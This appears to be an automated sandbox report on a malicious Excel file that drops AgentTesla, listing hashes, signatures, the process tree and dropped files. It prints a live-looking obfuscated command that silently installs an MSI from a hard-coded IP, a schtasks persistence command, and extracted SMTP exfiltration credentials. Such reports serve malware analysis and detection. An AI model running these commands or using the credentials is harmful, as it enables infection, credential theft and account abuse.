Analysis
-
max time kernel
144s -
max time network
85s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
30-06-2020 12:08
Static task
static1
Behavioral task
behavioral1
Sample
11203780.xls
Resource
win7v200430
Behavioral task
behavioral2
Sample
11203780.xls
Resource
win10
General
-
Target
11203780.xls
-
Size
172KB
-
MD5
14b2d3f08ad6543c060d19748f526167
-
SHA1
b10646324228a4b21154ef6e7d9d5469a61364e7
-
SHA256
7c3822b0015e740bb3e9a1c4d0d5da368cae8117a820152377d41de49ff3ca36
-
SHA512
e800b1d0531a7e5931d6ad9e1cd48003e80d0f366e62f55e6dd17de5613bed9bd431ee40d0baa42e51389d30c1d9509a83e6878faa11f11d8e5745725035766b
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
pagejeffrey@yandex.com - Password:
$44#@weC0*
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1020 1092 cmd.exe EXCEL.EXE -
AgentTesla Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/1172-17-0x0000000000400000-0x000000000044C000-memory.dmp family_agenttesla behavioral1/memory/1172-18-0x0000000000446ADE-mapping.dmp family_agenttesla behavioral1/memory/1172-20-0x0000000000400000-0x000000000044C000-memory.dmp family_agenttesla behavioral1/memory/1172-21-0x0000000000400000-0x000000000044C000-memory.dmp family_agenttesla -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 3 1044 msiexec.exe -
Executes dropped EXE 3 IoCs
Processes:
MSICA82.tmpMSICA82.tmpMSICA82.tmppid process 1768 MSICA82.tmp 1180 MSICA82.tmp 1172 MSICA82.tmp -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 108 msiexec.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
MSICA82.tmpdescription pid process target process PID 1768 set thread context of 1172 1768 MSICA82.tmp MSICA82.tmp -
Drops file in Windows directory 6 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSICA32.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICA82.tmp msiexec.exe File opened for modification C:\Windows\Installer\1c81f.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIC495.tmp msiexec.exe File created C:\Windows\Installer\1c81f.ipi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 1 IoCs
Processes:
msiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad msiexec.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1092 EXCEL.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
msiexec.exepid process 108 msiexec.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
msiexec.exeMSICA82.tmpMSICA82.tmppid process 1044 msiexec.exe 1044 msiexec.exe 1768 MSICA82.tmp 1768 MSICA82.tmp 1768 MSICA82.tmp 1172 MSICA82.tmp 1172 MSICA82.tmp -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
msiexec.exemsiexec.exeMSICA82.tmpMSICA82.tmpdescription pid process Token: SeShutdownPrivilege 108 msiexec.exe Token: SeIncreaseQuotaPrivilege 108 msiexec.exe Token: SeRestorePrivilege 1044 msiexec.exe Token: SeTakeOwnershipPrivilege 1044 msiexec.exe Token: SeSecurityPrivilege 1044 msiexec.exe Token: SeCreateTokenPrivilege 108 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 108 msiexec.exe Token: SeLockMemoryPrivilege 108 msiexec.exe Token: SeIncreaseQuotaPrivilege 108 msiexec.exe Token: SeMachineAccountPrivilege 108 msiexec.exe Token: SeTcbPrivilege 108 msiexec.exe Token: SeSecurityPrivilege 108 msiexec.exe Token: SeTakeOwnershipPrivilege 108 msiexec.exe Token: SeLoadDriverPrivilege 108 msiexec.exe Token: SeSystemProfilePrivilege 108 msiexec.exe Token: SeSystemtimePrivilege 108 msiexec.exe Token: SeProfSingleProcessPrivilege 108 msiexec.exe Token: SeIncBasePriorityPrivilege 108 msiexec.exe Token: SeCreatePagefilePrivilege 108 msiexec.exe Token: SeCreatePermanentPrivilege 108 msiexec.exe Token: SeBackupPrivilege 108 msiexec.exe Token: SeRestorePrivilege 108 msiexec.exe Token: SeShutdownPrivilege 108 msiexec.exe Token: SeDebugPrivilege 108 msiexec.exe Token: SeAuditPrivilege 108 msiexec.exe Token: SeSystemEnvironmentPrivilege 108 msiexec.exe Token: SeChangeNotifyPrivilege 108 msiexec.exe Token: SeRemoteShutdownPrivilege 108 msiexec.exe Token: SeUndockPrivilege 108 msiexec.exe Token: SeSyncAgentPrivilege 108 msiexec.exe Token: SeEnableDelegationPrivilege 108 msiexec.exe Token: SeManageVolumePrivilege 108 msiexec.exe Token: SeImpersonatePrivilege 108 msiexec.exe Token: SeCreateGlobalPrivilege 108 msiexec.exe Token: SeRestorePrivilege 1044 msiexec.exe Token: SeTakeOwnershipPrivilege 1044 msiexec.exe Token: SeRestorePrivilege 1044 msiexec.exe Token: SeTakeOwnershipPrivilege 1044 msiexec.exe Token: SeRestorePrivilege 1044 msiexec.exe Token: SeTakeOwnershipPrivilege 1044 msiexec.exe Token: SeRestorePrivilege 1044 msiexec.exe Token: SeTakeOwnershipPrivilege 1044 msiexec.exe Token: SeDebugPrivilege 1768 MSICA82.tmp Token: SeRestorePrivilege 1044 msiexec.exe Token: SeTakeOwnershipPrivilege 1044 msiexec.exe Token: SeRestorePrivilege 1044 msiexec.exe Token: SeTakeOwnershipPrivilege 1044 msiexec.exe Token: SeDebugPrivilege 1172 MSICA82.tmp -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
EXCEL.EXEMSICA82.tmppid process 1092 EXCEL.EXE 1092 EXCEL.EXE 1092 EXCEL.EXE 1172 MSICA82.tmp -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
EXCEL.EXEcmd.exemsiexec.exeMSICA82.tmpdescription pid process target process PID 1092 wrote to memory of 1020 1092 EXCEL.EXE cmd.exe PID 1092 wrote to memory of 1020 1092 EXCEL.EXE cmd.exe PID 1092 wrote to memory of 1020 1092 EXCEL.EXE cmd.exe PID 1020 wrote to memory of 108 1020 cmd.exe msiexec.exe PID 1020 wrote to memory of 108 1020 cmd.exe msiexec.exe PID 1020 wrote to memory of 108 1020 cmd.exe msiexec.exe PID 1020 wrote to memory of 108 1020 cmd.exe msiexec.exe PID 1020 wrote to memory of 108 1020 cmd.exe msiexec.exe PID 1044 wrote to memory of 1768 1044 msiexec.exe MSICA82.tmp PID 1044 wrote to memory of 1768 1044 msiexec.exe MSICA82.tmp PID 1044 wrote to memory of 1768 1044 msiexec.exe MSICA82.tmp PID 1044 wrote to memory of 1768 1044 msiexec.exe MSICA82.tmp PID 1768 wrote to memory of 1972 1768 MSICA82.tmp schtasks.exe PID 1768 wrote to memory of 1972 1768 MSICA82.tmp schtasks.exe PID 1768 wrote to memory of 1972 1768 MSICA82.tmp schtasks.exe PID 1768 wrote to memory of 1972 1768 MSICA82.tmp schtasks.exe PID 1768 wrote to memory of 1180 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1180 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1180 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1180 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1172 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1172 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1172 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1172 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1172 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1172 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1172 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1172 1768 MSICA82.tmp MSICA82.tmp PID 1768 wrote to memory of 1172 1768 MSICA82.tmp MSICA82.tmp
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\11203780.xls1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/11203780.msi /qn2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msiexec.exemsiExec /i http://199.195.250.60/gg/11203780.msi /qn3⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSICA82.tmp"C:\Windows\Installer\MSICA82.tmp"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QzxxmSogFmAhK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp699B.tmp"3⤵
- Creates scheduled task(s)
-
C:\Windows\Installer\MSICA82.tmp"{path}"3⤵
- Executes dropped EXE
-
C:\Windows\Installer\MSICA82.tmp"{path}"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmp699B.tmpMD5
b3f0284daaab917a86328b3339b8b463
SHA1a0593855a2eb96b0378c77e66e9ba345837f67fa
SHA2568fd32cc48b0336567a0469b4f2ba7e136ef78b59c322e15eace1004ea34cbabb
SHA512a740035edf3aea2b52f2b1577e548a0fe7ff1bbc651166967b7eff3ce9d1f728cb92a168ae65787a6e40daaa5a4917e09cc5f7cd0f9dd8da3a7e9952171732e2
-
C:\Windows\Installer\MSICA82.tmpMD5
42013c93a1711781565cb1373a43f971
SHA115a6ee651a4d11d55c2c130295c0f53741a2be62
SHA256dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1
SHA5123b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9
-
C:\Windows\Installer\MSICA82.tmpMD5
42013c93a1711781565cb1373a43f971
SHA115a6ee651a4d11d55c2c130295c0f53741a2be62
SHA256dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1
SHA5123b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9
-
C:\Windows\Installer\MSICA82.tmpMD5
42013c93a1711781565cb1373a43f971
SHA115a6ee651a4d11d55c2c130295c0f53741a2be62
SHA256dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1
SHA5123b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9
-
C:\Windows\Installer\MSICA82.tmpMD5
42013c93a1711781565cb1373a43f971
SHA115a6ee651a4d11d55c2c130295c0f53741a2be62
SHA256dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1
SHA5123b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9
-
memory/108-26-0x00000000023B0000-0x00000000023B4000-memory.dmpFilesize
16KB
-
memory/108-4-0x0000000000000000-mapping.dmp
-
memory/1020-3-0x0000000000000000-mapping.dmp
-
memory/1044-6-0x0000000000F80000-0x0000000000F84000-memory.dmpFilesize
16KB
-
memory/1044-7-0x0000000000F80000-0x0000000000F84000-memory.dmpFilesize
16KB
-
memory/1044-5-0x0000000001D80000-0x0000000001D84000-memory.dmpFilesize
16KB
-
memory/1044-25-0x0000000002550000-0x0000000002554000-memory.dmpFilesize
16KB
-
memory/1044-24-0x0000000000F80000-0x0000000000F84000-memory.dmpFilesize
16KB
-
memory/1044-22-0x0000000002550000-0x0000000002554000-memory.dmpFilesize
16KB
-
memory/1092-2-0x0000000006140000-0x0000000006240000-memory.dmpFilesize
1024KB
-
memory/1092-1-0x0000000006140000-0x0000000006240000-memory.dmpFilesize
1024KB
-
memory/1092-0-0x0000000006140000-0x0000000006240000-memory.dmpFilesize
1024KB
-
memory/1172-20-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/1172-18-0x0000000000446ADE-mapping.dmp
-
memory/1172-21-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/1172-17-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/1768-13-0x0000000000000000-0x0000000000000000-disk.dmp
-
memory/1768-9-0x0000000000000000-mapping.dmp
-
memory/1972-14-0x0000000000000000-mapping.dmp